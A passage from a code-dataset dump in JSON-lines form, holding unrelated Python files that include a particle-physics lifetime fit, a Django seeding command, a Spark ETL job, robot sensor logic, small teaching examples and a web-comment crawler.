CORRECTED_COUNTS_BEST[bkg].GetBinWidth(bin_idx1d)\n\n CORRECTED_COUNTS_H2[bkg].SetBinContent(\n bin_idx, counts/eff/presel_eff/abs_corr/bin_width)\n CORRECTED_COUNTS_H2[bkg].SetBinError(\n bin_idx, counts_err/eff/presel_eff/abs_corr/bin_width)\n\n\ndef fill_corrected_best(bkg, ctbin, counts, counts_err, eff):\n bin_idx = CORRECTED_COUNTS_BEST[bkg].FindBin((ctbin[0] + ctbin[1]) / 2)\n abs_corr = get_absorption_correction(ctbin)\n presel_eff = get_presel_eff(ctbin)\n bin_width = CORRECTED_COUNTS_BEST[bkg].GetBinWidth(bin_idx)\n\n CORRECTED_COUNTS_BEST[bkg].SetBinContent(\n bin_idx, counts/eff/presel_eff/abs_corr/bin_width)\n CORRECTED_COUNTS_BEST[bkg].SetBinError(\n bin_idx, counts_err/eff/presel_eff/abs_corr/bin_width)\n\n\ndef get_signscan_eff(ctbin):\n key = f'ct{ctbin[0]}{ctbin[1]}pt{PT_BINS[0]}{PT_BINS[1]}'\n return sigscan_dict[key]\n\n\ndef get_eff_index(eff):\n idx = (eff - EFF_MIN + EFF_STEP) * 100\n if isinstance(eff, np.ndarray):\n return idx.astype(int)\n\n return int(idx)\n\n\ndef get_corrected_counts(bkg, ctbin, eff):\n bin_idx = CORRECTED_COUNTS_H2[bkg].FindBin(\n (ctbin[0] + ctbin[1]) / 2, round(eff + 0.005, 3))\n\n counts = CORRECTED_COUNTS_H2[bkg].GetBinContent(bin_idx)\n error = CORRECTED_COUNTS_H2[bkg].GetBinError(bin_idx)\n\n return counts, error\n\n\ndef get_measured_h2(h2, bkg, ctbin, eff):\n bin_idx = h2[bkg].FindBin((ctbin[0] + ctbin[1]) / 2, round(eff + 0.005, 3))\n var = h2[bkg].GetBinContent(bin_idx)\n error = h2[bkg].GetBinError(bin_idx)\n return var, error\n\n\ndef get_effscore_dict(ctbin):\n info_string = f'090_210_{ctbin[0]}{ctbin[1]}'\n file_name = efficiency_dir + f'/Eff_Score_{info_string}.npy'\n return {round(e[0], 2): e[1] for e in np.load(file_name).T}\n\n\n###############################################################################\n# significance-scan/fixed efficiencies switch\n\nif not SIGNIFICANCE_SCAN:\n eff_best_array = np.full(len(CT_BINS) - 1, FIX_EFF)\nelse:\n eff_best_array = [round(sigscan_dict[f'ct{ctbin[0]}{ctbin[1]}pt210'][0], 2) for ctbin in zip(\n CT_BINS[:-1], CT_BINS[1:])]\n\n# efficiency ranges for sampling the systematics\nsyst_eff_ranges = np.asarray([list(range(int(x * 100) - 10, int(x * 100) + 11)) for x in eff_best_array]) / 100\n# define the expo function for the lifetime fit\nexpo = ROOT.TF1('myexpo', '[0]*exp(-x/([1]*0.029979245800))/((exp(-[2]/([1]*0.029979245800)) - exp(-[3]/([1]*0.029979245800))) * [1]*0.029979245800)', 1, 35)\nexpo.SetParLimits(1, 230, 290)\n#################################################\n\n\nfor index, ctbin in enumerate(zip(CT_BINS[:-1], CT_BINS[1:])):\n bdt_eff_best = round(sigscan_dict[f'ct{ctbin[0]}{ctbin[1]}pt210'][0], 2)\n presel_eff = get_presel_eff(ctbin)\n for bdt_eff in syst_eff_ranges[index]:\n for model in BKG_MODELS:\n raw_counts, raw_counts_error = get_measured_h2(\n RAW_COUNTS_H2, model, ctbin, bdt_eff)\n fill_corrected(model, ctbin, raw_counts, raw_counts_error, bdt_eff)\n # print(\"ct bin: \", ctbin, \"BDT eff best: \", bdt_eff_best, \", BDT eff: \", bdt_eff, \", Raw counts: \", raw_counts)\n if bdt_eff == bdt_eff_best:\n print(\"ct bin: \", ctbin, \"BDT eff best: \", bdt_eff_best, \", Presel eff: \", presel_eff, \", Raw counts: \", raw_counts)\n\n fill_corrected_best(model, ctbin, raw_counts,raw_counts_error, bdt_eff)\n\n\ntau_syst_array = np.zeros(SYSTEMATICS_COUNTS)\n\nif SYSTEMATICS:\n # systematics histos\n lifetime_dist = ROOT.TH1D(\n 'syst_lifetime', ';#tau ps ;counts', 100, 150, 350)\n lifetime_prob = ROOT.TH1D('prob_lifetime', ';prob. ;counts', 100, 0, 1)\n\n tmp_ctdist = CORRECTED_COUNTS_BEST[BKG_MODELS[0]].Clone('tmp_ctdist')\n\n combinations = set()\n sample_counts = 0 # good fits;\n iterations = 0 # total fits\n\n # stop with SYSTEMATICS_COUNTS number of good B_{Lambda} fits\n while sample_counts < SYSTEMATICS_COUNTS:\n tmp_ctdist.Reset()\n\n iterations += 1\n\n bkg_list = []\n eff_list = []\n bkg_idx_list = []\n eff_idx_list = []\n\n # loop over ctbins\n for ctbin_idx in range(len(CT_BINS) - 1):\n # random bkg model\n bkg_index = np.random.randint(0, len(BKG_MODELS))\n bkg_idx_list.append(bkg_index)\n bkg_list.append(BKG_MODELS[bkg_index])\n\n # random BDT efficiency in the defined range\n eff = np.random.choice(syst_eff_ranges[ctbin_idx])\n eff_list.append(eff)\n eff_idx = get_eff_index(eff)\n eff_idx_list.append(eff_idx)\n\n # convert indexes into hash and if already sampled skip this combination\n combo = ''.join(map(str, bkg_idx_list + eff_idx_list))\n if combo in combinations:\n continue\n\n # if indexes are good measure lifetime\n ctbin_idx = 1\n ct_bin_it = iter(zip(CT_BINS[:-1], CT_BINS[1:]))\n\n for model, eff in zip(bkg_list, eff_list):\n ctbin = next(ct_bin_it)\n\n counts, error = get_corrected_counts(model, ctbin, eff)\n\n tmp_ctdist.SetBinContent(ctbin_idx, counts)\n tmp_ctdist.SetBinError(ctbin_idx, error)\n\n ctbin_idx += 1\n\n tmp_ctdist.Fit(expo, 'QRMSI+', '', 1, 35)\n\n # if ct fit is good use it for systematics\n if expo.GetChisquare() > 2. * expo.GetNDF():\n continue\n\n lifetime_dist.Fill(expo.GetParameter(1))\n lifetime_prob.Fill(expo.GetProb())\n\n combinations.add(combo)\n\n tau_syst_array[sample_counts] = expo.GetParameter(1)\n sample_counts += 1\n\n output_file.cd()\n\n lifetime_dist.Write()\n lifetime_prob.Write()\n\n print('\\n++++++++++++++++++++++++++++++++++++++++++++++++++')\n print(\n f'\\nGood iterations / Total iterations -> {SYSTEMATICS_COUNTS/iterations:.4f}')\n print('\\n++++++++++++++++++++++++++++++++++++++++++++++++++')\n\n\nkBlueC = ROOT.TColor.GetColor('#1f78b4')\nkOrangeC = ROOT.TColor.GetColor(\"#ff7f00\")\nkBlueCT = ROOT.TColor.GetColorTransparent(kBlueC, 0.5)\nkRedC = ROOT.TColor.GetColor('#e31a1c')\nkRedCT = ROOT.TColor.GetColorTransparent(kRedC, 0.5)\n\nlikelihood = False\nopt_fit = 'QRMSIL+' if likelihood else 'QRMSI+'\nfit_range = [1,35]\n\nnp.save(results_dir + f'/{FILE_PREFIX}_tau_syst_array.npy', tau_syst_array)\n\nfor model in BKG_MODELS:\n output_file.cd()\n\n RAW_COUNTS_H2[model].Write()\n RAW_COUNTS_BEST[model].Write()\n\n CORRECTED_COUNTS_H2[model].Write()\n CORRECTED_COUNTS_BEST[model].Write()\n\n CORRECTED_COUNTS_BEST[model].UseCurrentStyle()\n\n\n\n\n\n\n\n print('Integral: ', CORRECTED_COUNTS_BEST[model].Integral(fit_range[0],fit_range[1], \"width\"))\n expo.FixParameter(0, CORRECTED_COUNTS_BEST[model].Integral(fit_range[0],fit_range[1], \"width\"))\n expo.FixParameter(2, fit_range[0])\n expo.FixParameter(3, fit_range[1])\n fit_result = CORRECTED_COUNTS_BEST[model].Fit(expo, opt_fit, '', fit_range[0], fit_range[1])\n print('Function Integral: ', expo.Integral(1,35))\n\n chi2 = 0\n for iBin in range(1,CORRECTED_COUNTS_BEST[model].GetNbinsX() + 1):\n diff = (expo.Integral(CORRECTED_COUNTS_BEST[model].GetBinLowEdge(iBin), CORRECTED_COUNTS_BEST[model].GetXaxis().GetBinUpEdge(iBin)) - CORRECTED_COUNTS_BEST[model].GetBinContent(iBin)*CORRECTED_COUNTS_BEST[model].GetBinWidth(iBin))**2\n den = (CORRECTED_COUNTS_BEST[model].GetBinError(iBin)*CORRECTED_COUNTS_BEST[model].GetBinWidth(iBin))**2\n chi2 += diff/den\n\n\n print('Chi2: ', chi2/(expo.GetNDF()))\n print('Chi2 Func: ', expo.GetChisquare()/(expo.GetNDF()))\n\n \n\n graph_result = ROOT.TGraph()\n graph_result.SetName(f\"likelihood_{model}\")\n fit_result.Scan(1, graph_result,240, 320)\n graph_result.Write()\n\n fit_function = CORRECTED_COUNTS_BEST[model].GetFunction('myexpo')\n fit_function.SetLineColor(kOrangeC)\n fit_function.SetLineWidth(2)\n\n canvas = ROOT.TCanvas(f'ct_spectra_{model}')\n canvas.SetTopMargin(0.052)\n canvas.SetRightMargin(0.01)\n canvas.SetLeftMargin(0.13)\n\n\n canvas.SetLogy()\n\n frame = ROOT.gPad.DrawFrame(-0.5, 1, 35.5, 1000, ';#it{c}t (cm);d#it{N}/d(#it{c}t) [(cm)^{-1}]')\n\n frame.GetXaxis().SetTitleSize(0.07)\n frame.GetYaxis().SetTitleSize(0.07)\n frame.GetXaxis().SetTitleOffset(0.9)\n frame.GetYaxis().SetTitleOffset(0.9)\n\n frame.GetYaxis().SetLabelSize(0.05)\n frame.GetXaxis().SetLabelSize(0.05)\n\n pinfo = ROOT.TPaveText(0.4, 0.63, 0.88, 0.91, 'NDC')\n pinfo.SetBorderSize(0)\n pinfo.SetFillStyle(0)\n pinfo.SetTextAlign(22)\n pinfo.SetTextFont(43)\n pinfo.SetTextSize(36)\n\n strings = []\n strings.append('ALICE')\n strings.append('Pb#font[122]{-}Pb, 0-90%, #sqrt{#it{s}_{NN}} = 5.02 TeV')\n strings.append(f'#tau = {fit_function.GetParameter(1):.0f} #pm 11 (stat.) #pm 6 (syst.) ps')\n strings.append(f'Fit Probability = {fit_function.GetProb():.2f}')\n\n for s in strings:\n pinfo.AddText(s)\n\n new_expo = ROOT.TF1('new_expo2', '[0]*exp(-x/([1]*0.029979245800))/((exp(-[2]/([1]*0.029979245800)) - exp(-[3]/([1]*0.029979245800))) * [1]*0.029979245800)', 1, 35)\n new_expo.SetParameter(0, fit_function.GetParameter(0))\n new_expo.SetParameter(1, fit_function.GetParameter(1))\n new_expo.SetParameter(2, fit_function.GetParameter(2))\n new_expo.SetParameter(3, fit_function.GetParameter(3))\n new_expo.Draw('same')\n\n\n CORRECTED_COUNTS_BEST[model].Draw('ex0same')\n CORRECTED_COUNTS_BEST[model].SetMarkerStyle(20)\n CORRECTED_COUNTS_BEST[model].SetMarkerColor(kBlueC)\n CORRECTED_COUNTS_BEST[model].SetLineColor(kBlueC)\n CORRECTED_COUNTS_BEST[model].SetMinimum(0.001)\n CORRECTED_COUNTS_BEST[model].SetMaximum(1000)\n CORRECTED_COUNTS_BEST[model].SetStats(0)\n\n frame.GetYaxis().SetRangeUser(7, 2000)\n frame.GetXaxis().SetRangeUser(0.5, 35.5)\n pinfo.Draw('x0same')\n\n canvas.Write()\n\noutput_file.Close()\n\n\n# new_out = ROOT.TFile('out2.root', \"recreate\")\n# CORRECTED_COUNTS_BEST['pol1'].Write()\n# new_out.Close()","sub_path":"common/compute_lifetime.py","file_name":"compute_lifetime.py","file_ext":"py","file_size_in_byte":15934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"339864726","text":"from runtime import proRuntime as runtime\n\ndef smallestMultiple(a, b):\n num = 1\n result = 0\n j = 0\n\n while True:\n for i in range(a, b+1, 1):\n if num % i == 0:\n result = num if i == b else i\n j = i\n continue\n else:\n break\n\n num += 1\n if j == b:\n break\n\n print(result)\n\nsmallestMultiple(1, 20)\n\nruntime()\n# --- 320.50462222099304 seconds ---","sub_path":"problem5.py","file_name":"problem5.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"185388063","text":"from django.conf import settings\n\nfrom hcap_geo.models import Region\nfrom hcap_utils.contrib.management import BaseSeedCommand\n\nCSV_DIR = settings.BASE_DIR / \"hcap_geo\" / \"data\" / \"region\" / \"csv\"\n\n\nclass Command(BaseSeedCommand):\n CONTEXT_BRAZIL = \"brazil\"\n\n app = \"geo\"\n model = \"region\"\n\n context_choices = (CONTEXT_BRAZIL,)\n\n def seed(self):\n if self.context == self.CONTEXT_BRAZIL:\n self.seed_brazil_data()\n else:\n self.raise_message(f'Unknown context \"{self.context}\"')\n\n def seed_brazil_data(self):\n self.seed_from_csv(CSV_DIR / \"1_world\")\n self.seed_from_csv(CSV_DIR / \"2_continents\")\n self.seed_from_csv(CSV_DIR / \"3_countries\")\n\n brazil_dir = CSV_DIR / \"3_countries/076_brazil\"\n\n self.seed_from_csv(brazil_dir / \"4_regioes\")\n self.seed_from_csv(brazil_dir / \"4_regioes_lat_lng\")\n self.seed_from_csv(brazil_dir / \"5_ufs\")\n self.seed_from_csv(brazil_dir / \"5_ufs_lat_lng\")\n self.seed_from_csv(brazil_dir / \"6_mesorregioes\")\n self.seed_from_csv(brazil_dir / \"6_microrregioes\")\n self.seed_from_csv(brazil_dir / \"7_municipios\")\n\n def fetch_model(self, row):\n kind = int(row[\"kind\"])\n parent_hierarchy = row[\"parent_hierarchy\"]\n code = row[\"code\"]\n\n try:\n region = Region.objects.get(kind=kind, parent_hierarchy=parent_hierarchy, code=code)\n except Exception:\n region = Region(kind=kind, parent_hierarchy=parent_hierarchy, code=code)\n\n name = row.get(\"name\")\n if name not in [None, \"\"]:\n region.name = name\n\n abbr = row.get(\"abbr\")\n if abbr not in [None, \"\"]:\n region.abbr = abbr\n\n lat = row.get(\"lat\")\n lng = row.get(\"lng\")\n if lat not in [None, \"\"] and lng not in [None, \"\"]:\n region.lat = lat\n region.lng = lng\n\n return region\n\n def fetch_relations(self, region, row):\n queries = row.get(\"parents\")\n\n if queries not in [None, \"\"]:\n parents = []\n\n for query in queries.split(\";\"):\n queryset = Region.objects\n\n for query_item in query.split(\"&\"):\n (kind, code) = query_item.split(\"=\")\n kind = int(kind)\n\n if isinstance(queryset, Region):\n queryset = queryset.children.get(kind=kind, code=code)\n else:\n queryset = queryset.get(kind=kind, code=code)\n\n if isinstance(queryset, Region):\n parents.append(queryset)\n else:\n self.raise_message(f'Parent \"{query}\" not found')\n\n if len(parents) > 0:\n region.parents.set(parents)\n","sub_path":"hcap_geo/management/commands/seed_base_regions.py","file_name":"seed_base_regions.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"265618217","text":"#!/usr/bin/env python\n\nimport configparser\nimport os\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import row_number\nfrom pyspark.sql.functions import (year,\n month,\n dayofmonth,\n hour,\n weekofyear,\n date_format,\n from_unixtime,\n desc)\nfrom pyspark.sql.window import Window\n\n\nconfig = configparser.ConfigParser()\nconfig.read('dl.cfg')\n\nos.environ['AWS_ACCESS_KEY_ID']=config['AWS_ACCESS_KEY_ID']\nos.environ['AWS_SECRET_ACCESS_KEY']=config['AWS_SECRET_ACCESS_KEY']\n\n\ndef create_spark_session():\n spark = SparkSession \\\n .builder \\\n .config(\"spark.jars.packages\", \"org.apache.hadoop:hadoop-aws:2.7.0\") \\\n .getOrCreate()\n return spark\n\n\ndef process_song_data(spark, input_data, output_data):\n # get filepath to song data file\n song_data = input_data + \"song_data/*/*/*/*.json\"\n\n # read song data file\n df = spark.read.json(song_data)\n\n # extract columns to create songs table\n cols = [\"song_id\", \"title\", \"artist_id\", \"year\", \"duration\"]\n songs_table = (df.filter(df.song_id.isNotNull())\n .select(cols)\n .distinct())\n\n # write songs table to parquet files partitioned by year and artist\n path = output_data + \"songs_table.parquet\"\n partition = [\"year\", \"artist_id\"]\n (songs_table.write\n .partitionBy(partition)\n .format(\"parquet\")\n .save(path))\n\n # extract columns to create artists table\n cols = [\"artist_id\", \"artist_name\", \"artist_location\", \"artist_latitude\", \"artist_longitude\"]\n artists_table = (df.filter(df.artist_id.isNotNull())\n .select(cols)\n .distinct()\n .withColumnRenamed(\"artist_name\", \"name\")\n .withColumnRenamed(\"artist_location\", \"location\")\n .withColumnRenamed(\"artist_latitude\", \"latitude\")\n .withColumnRenamed(\"artist_longitude\", \"longitude\"))\n\n\n # write artists table to parquet files\n path = output_data + \"artists_table.parquet\"\n (artists_table.write\n .format(\"parquet\")\n .save(path))\n\n\ndef process_log_data(spark, input_data, output_data):\n # get filepath to log data file\n log_data =input_data + \"log_data/*/*/*.json\"\n\n # read log data file\n df = spark.read.json(log_data)\n\n # filter by actions for song plays\n df = df.filter(df.page == \"NextSong\")\n\n # create datetime column from original timestamp column\n df = df.withColumn(\"start_time\", from_unixtime(df.ts / 1000.))\n\n # extract columns to create time table\n time_table = (df.select(\"start_time\")\n .withColumn(\"hour\", hour(df.start_time))\n .withColumn(\"dat\", dayofmonth(df.start_time))\n .withColumn(\"week\", weekofyear(df.start_time))\n .withColumn(\"month\", month(df.start_time))\n .withColumn(\"year\", year(df.start_time))\n .withColumn(\"weekday\", date_format(df.start_time, \"u\")))\n\n # write time table to parquet files partitioned by year and month\n path = output_data + \"time_table.parquet\"\n partition = [\"year\", \"month\"]\n (time_table.write\n .partitionBy(partition)\n .format(\"parquet\")\n .save(path))\n\n # extract columns to create users table\n cols = [\"userId\", \"firstName\", \"lastName\", \"gender\", \"level\"]\n window = Window.partitionBy(\"userId\").orderBy(desc(\"start_time\"))\n users_table = (df.filter(df.userId.isNotNull())\n .withColumn(\"rn\", row_number().over(window)))\n users_table = (users_table.filter(users_table.rn == 1)\n .drop(\"rn\")\n .select(cols)\n .withColumnRenamed(\"userId\", \"user_id\")\n .withColumnRenamed(\"firstName\", \"first_name\")\n .withColumnRenamed(\"lastName\", \"last_name\"))\n\n # write users table to parquet files\n path = output_data + \"users_table.parquet\"\n (users_table.write\n .format(\"parquet\")\n .save(path))\n\n # read in song data to use for songplays table\n path = output_data + \"songs_table.parquet\"\n song_df = spark.read.parquet(path)\n\n # extract columns from joined song and log datasets to create songplays table \n cols = [\"start_time\", \"userId\", \"level\", \"song_id\", \"artist_id\", \"sessionId\", \"location\", \"userAgent\"]\n cond_song = [df.song == song_df.title, df.length == song_df.duration]\n window = Window.orderBy(\"start_time\")\n songplays_table = (df.join(song_df, cond_song)\n .select(cols)\n .withColumn(\"songplay_id\", row_number().over(window))\n .withColumnRenamed(\"userId\", \"user_id\")\n .withColumnRenamed(\"sessionId\", \"session_id\")\n .withColumnRenamed(\"userAgent\", \"user_agent\")\n .withColumn(\"year\", year(df.start_time))\n .withColumn(\"month\", month(df.start_time)))\n\n # write songplays table to parquet files partitioned by year and month\n path = output_data + \"songplays_table.parquet\"\n partition = [\"year\", \"month\"]\n (songplays_table.write\n .partitionBy(partition)\n .format(\"parquet\")\n .save(path))\n\n\ndef main():\n spark = create_spark_session()\n input_data = \"s3a://udacity-dend/\"\n output_data = \"s3://ud-dataengineer/\"\n\n process_song_data(spark, input_data, output_data) \n process_log_data(spark, input_data, output_data)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"project4/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"205637603","text":"\nfrom hercules_framework.handlers import BaseHandler, run_method_safe\nfrom hercules_framework.models.auth_user import AuthUserModel\nfrom hercules_framework.jwt.jwt_auth import JwTAuth\n\n\nclass AuthUser(BaseHandler):\n SUPPORTED_METHODS = (\"GET\",)\n @run_method_safe\n async def get(self):\n auth = AuthUserModel.from_dict(self.get_query_args())\n if auth.username is None:\n self.send_response(code=403, message='Forbidden')\n return\n self.send_response(\n data={\"token\": JwTAuth.generate_auth_token(auth.username)})\n","sub_path":"app/interface/handlers/v1/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"544807269","text":"class Car:\n \"\"\"A simple attempt to represent a car.\"\"\"\n\n def __init__(self, make, model, year):\n \"\"\"Initialize attributes to describe a car.\"\"\"\n self.make = make\n self.model = model\n self.year = year\n\n def get_descriptive_name(self):\n \"\"\"Return a neatly formatted descriptive name.\"\"\"\n long_name = f\"{self.year} {self.make} {self.model}\"\n return long_name.title()\n\nmy_new_car = Car('audi', 'a4', 2019)\nprint(my_new_car.get_descriptive_name())\n\n#at 'get_descriptive_name()' we define a method that puts a car's year, make, and model into one string neatly describing the car.\n#at 'my_new_car' we make an instance from the 'Car' class and assign it to the variable. Then we call 'get_descriptive_name()' to show what kind of car.\n","sub_path":"section-9/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"637591735","text":"# -*- encoding: utf-8 -*-\nclass ValidatedProperty:\n def __init__(self, initial, min, max):\n self.max = max\n self.min = min\n self.initial = initial\n self.name = None\n\n def func(self):\n print('calling func of', self)\n\n def __set_name__(self, owner, name):\n self.name = '_validated_' + name\n\n def __get__(self, instance, owner):\n # print('in getter', instance, owner)\n return getattr(instance, self.name, self.initial)\n\n def __set__(self, instance, value):\n # print('in setter', instance, value)\n if value <= self.max and value >= self.min:\n setattr(instance, self.name, value)\n\n def __delete__(self, instance):\n print('in deleter', instance)\n if hasattr(instance, self.name):\n delattr(instance, self.name)\n\n\nclass A:\n a = ValidatedProperty(0, min=0, max=10)\n b = ValidatedProperty(0, min=-10, max=0)\n\n\na = A()\nprint('initial values: a =', a.a, ', b =', a.b)\n\na.a = 5\na.b = -5\nprint('after valid value settings: a =', a.a, ', b =', a.b)\n\na.a = 50\na.b = 100\nprint('after invalid value settings: a =', a.a, ', b =', a.b)\n\n# print(dir(a))\n\ndel a.a\ndel a.b\nprint('after delete / resetting: a =', a.a, ', b =', a.b)\n\n# a.a.func()\n# A.a.func()\nA.__dict__['a'].func()\nA.__dict__['b'].func()\n","sub_path":"06-controlled-properties/04-descriptor-validator.py","file_name":"04-descriptor-validator.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"582359021","text":"#!/usr/bin/env python\n\nfrom Sensors import Sensors\nfrom random import randint\n# calss for all the distance sensors\nclass Distance_sensors(Sensors):\n def __init__(self, io):\n\n Sensors.__init__(self, io)\n\n # Collision to the left IR\n self.LeftIRcollision = (0, 0)\n\n # Collision to the right IR\n self.RightIRcollision = (0, 0)\n\n # Collision to the Sonar\n self.SonarCollison = (0, 0)\n\n # Thresholds of its sensor\n self.left_IR_limit = 414 # 15 #480\n self.right_IR_limit = 414\n self.sonar_limit = 22 # 22\n self.turn = 1\n\n # Transform IR measurements to distance\n def from_IR_readings_2_distance(self, SensorValue):\n if SensorValue == 20.0:\n distance = 0.0\n else:\n distance = 4800.0 / (SensorValue - 20.0)\n return distance\n # set the limits of the sensors and the directions\n\n def update_direction(self):\n\n # left_distance = 100\n # right_distance = 100\n\n # left_distance = self.from_IR_readings_2_distance(self.analogs_sensors[0])\n # right_distance = self.from_IR_readings_2_distance(self.analogs_sensors[7])\n\n # self.LeftIRcollision = (0,-1) if left_distance <= self.left_IR_limit else (0,0)\n # self.RightIRcollision = (0,1) if right_distance <= self.right_IR_limit else (0,0)\n # self.SonarCollision = (-1,0) if self.analogs_sensors[6] <= self.sonar_limit else (0,0)\n\n self.LeftIRcollision = (0, -1) if self.analogs_sensors[0] >= self.left_IR_limit else (0, 0)\n self.RightIRcollision = (0, 1) if self.analogs_sensors[7] >= self.right_IR_limit else (0, 0)\n random = randint(0, 10)\n if random >= 5:\n self.SonarCollision = (-1, self.turn) if self.analogs_sensors[6] <= self.sonar_limit else (0, 0)\n else:\n self.SonarCollision = (-1, self.turn) if self.analogs_sensors[6] <= self.sonar_limit else (0, 0)\n ################################# (-1,-1)!! changed\n\n # provide the overall direction out of the distance sensor\t\n def return_direction_IR_Sonar_Sensors(self):\n\n self.update_analog_sensors_meas()\n\n self.update_direction()\n\n # Adding coordinates\n # (1,2) + (10,10) + (20,20) = (31,32)\n return tuple(map(sum, zip(self.LeftIRcollision, self.RightIRcollision, self.SonarCollision)))\n","sub_path":"sensing/Distance_sensors.py","file_name":"Distance_sensors.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"38485259","text":"print(\"*****Compute the Hypotenuse*****\")\r\n\r\n# import math module for square root\r\nimport math\r\n\r\n# define function named triangle with parameters sideOne and sideTwo\r\ndef triangle(sideOne, sideTwo):\r\n\r\n # calculate the hypotenuse using pythagorean theorem\r\n hypotenuse = math.sqrt(sideOne * sideOne + sideTwo * sideTwo)\r\n\r\n # return the hypotenuse\r\n return hypotenuse\r\n\r\n# ask the user to input the two side lengths of the right triangle\r\nsideOne = int(input(\"enter side a: \"))\r\nsideTwo = int(input(\"enter side b: \"))\r\n\r\n# invoke the function and set it as h\r\nh = triangle(sideOne, sideTwo)\r\nprint(f\"the hypotenuse is: {h:.2f}\")\r\n","sub_path":"hypotensue.py","file_name":"hypotensue.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"442940603","text":"import logging\nimport sys\nfrom ..proxy import proxy\nimport threading\nimport arrow\nfrom db import Session\nfrom ..models.comment import Comment\nfrom ..models.content import Content\nfrom time import time\nfrom sentry import ravenClient\n\ndef requestComments(contentId, pageNumber = 1, pageSize = 50):\n params = {\n 'isNeedAllCount': 'true',\n 'isReaderOnlyUpUser': 'false',\n 'isAscOrder': 'false',\n 'contentId': contentId,\n 'currentPage': pageNumber,\n 'pageSize': pageSize,\n }\n return proxy.get(\n 'http://www.acfun.cn/comment_list_json.aspx',\n params = params,\n Referer = \"http://www.acfun.cn/a/ac{}\".format(contentId)\n )\n\ndef getCommentDictFromRes(res):\n data = res.json().get('data')\n commentIdList = data.get('commentList')\n return data.get('commentContentArr')\n\ndef getCommentsByOrder(contentId, crawlAll):\n \"\"\"根据content ID抓取评论\n Args:\n contentId: content ID\n crawlAll: 是否抓取此内容的所有评论, 如果是False, 那么只抓取前200个\n\n Returns: commentList\n \"\"\"\n res = requestComments(contentId)\n if res.status_code != 200:\n ravenClient.captureMessage('Comment Request Error', extra= { 'res': res, 'statusCode': res.status_code, 'text': res.text })\n totalPage = 1\n commentDict = {}\n else:\n totalPage = res.json().get('data').get('totalPage')\n commentDict = getCommentDictFromRes(res)\n\n if crawlAll is True:\n for pageNumber in range(1, int(totalPage)):\n newCommentDict = getCommentDictFromRes(requestComments(contentId, pageNumber + 1))\n commentDict.update(newCommentDict)\n\n return commentDict.values()\n\n\ndef formatCommentToModel(comment, contentId):\n return {\n 'id': comment.get('cid'),\n 'content': comment.get('content'),\n 'userId': comment.get('userID'),\n 'postDate': comment.get('postDate'),\n 'quoteId': comment.get('quoteId'),\n 'isDelete': comment.get('isDelete'),\n 'isUpDelete': comment.get('isUpDelete'),\n 'contentId': contentId,\n }\n\ndef fromatComments(comments, contentId):\n return [formatCommentToModel(comment, contentId) for comment in comments]\n\ndef saveComments(comments):\n session = Session()\n commentIds = { comment['id'] for comment in comments }\n commentsInDB = session.query(Comment.id).filter(Comment.id.in_(commentIds)).all()\n commentIdsInDB = { comment.id for comment in commentsInDB }\n if commentIdsInDB is None:\n commentIdsInDB = []\n commentIdsInDB = set(commentIdsInDB)\n\n # 添加新的评论\n needAddCommentIds = commentIds - commentIdsInDB\n needAddComments = list(filter(lambda c: c['id'] in needAddCommentIds, comments))\n session.add_all([ Comment(**comment) for comment in needAddComments])\n session.commit()\n\n #更新旧的评论\n needUpdateComments = list(filter(lambda c: c['id'] in commentIdsInDB and (c['isDelete'] is True or c['isUpDelete'] is True), comments))\n for comment in needUpdateComments:\n session.query(Comment).filter(Comment.id == comment.get('id')).update({\n 'isDelete': comment.get('isDelete'),\n 'isUpDelete': comment.get('isUpDelete')\n })\n session.commit()\n\n session.close()\n\n\ndef crawlCommentsByContentId(contentId, crawlAll):\n start = time()\n startGetTime = time()\n\n comments = getCommentsByOrder(contentId, crawlAll)\n timeOfGet = time() - startGetTime\n\n startSaveTime = time()\n comments = fromatComments(comments, contentId)\n saveComments(comments)\n timeOfSave = time() - startSaveTime\n\n timeOfTotal = time() - start\n # logging.info(\n # '抓取内容:' + str(contentId) + '评论' +\n # '[一共花费' + str(timeOfTotal) + ' 秒]' +\n # '[请求数据花费' + str(timeOfGet) +'秒]' +\n # '[处理并保存数据花费' + str(timeOfSave) +'秒]'\n # )\n\ndef crawlCommentsByContentIds(contentIds, crawlAll):\n for contentId in contentIds:\n crawlCommentsByContentId(contentId, crawlAll)\n\ndef crawlLatestComments(day, useThread = True, threadCrawlNum = 30, crawlAll = False):\n start = time()\n session = Session()\n contents = session.query(Content.id).filter(Content.publishedAt >= arrow.now().shift(days= -day).format('YYYY-MM-DD HH:MM:SS')).all()\n contentIds = [ c.id for c in contents ]\n if useThread:\n threadList = []\n for i in range(0, len(contentIds) + 1, threadCrawlNum):\n t = threading.Thread(target = crawlCommentsByContentIds, args = (contentIds[i:i+threadCrawlNum], crawlAll))\n t.start()\n threadList.append(t)\n\n for t in threadList:\n t.join()\n else:\n crawlCommentsByContentIds(contentIds, crawlAll)\n logging.info('此次一共抓取' + str(len(contentIds)) + '个内容的评论,共使用:' + str(time() - start) + '秒')\n","sub_path":"server/spiders/comment.py","file_name":"comment.py","file_ext":"py","file_size_in_byte":4935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"359164950","text":"import 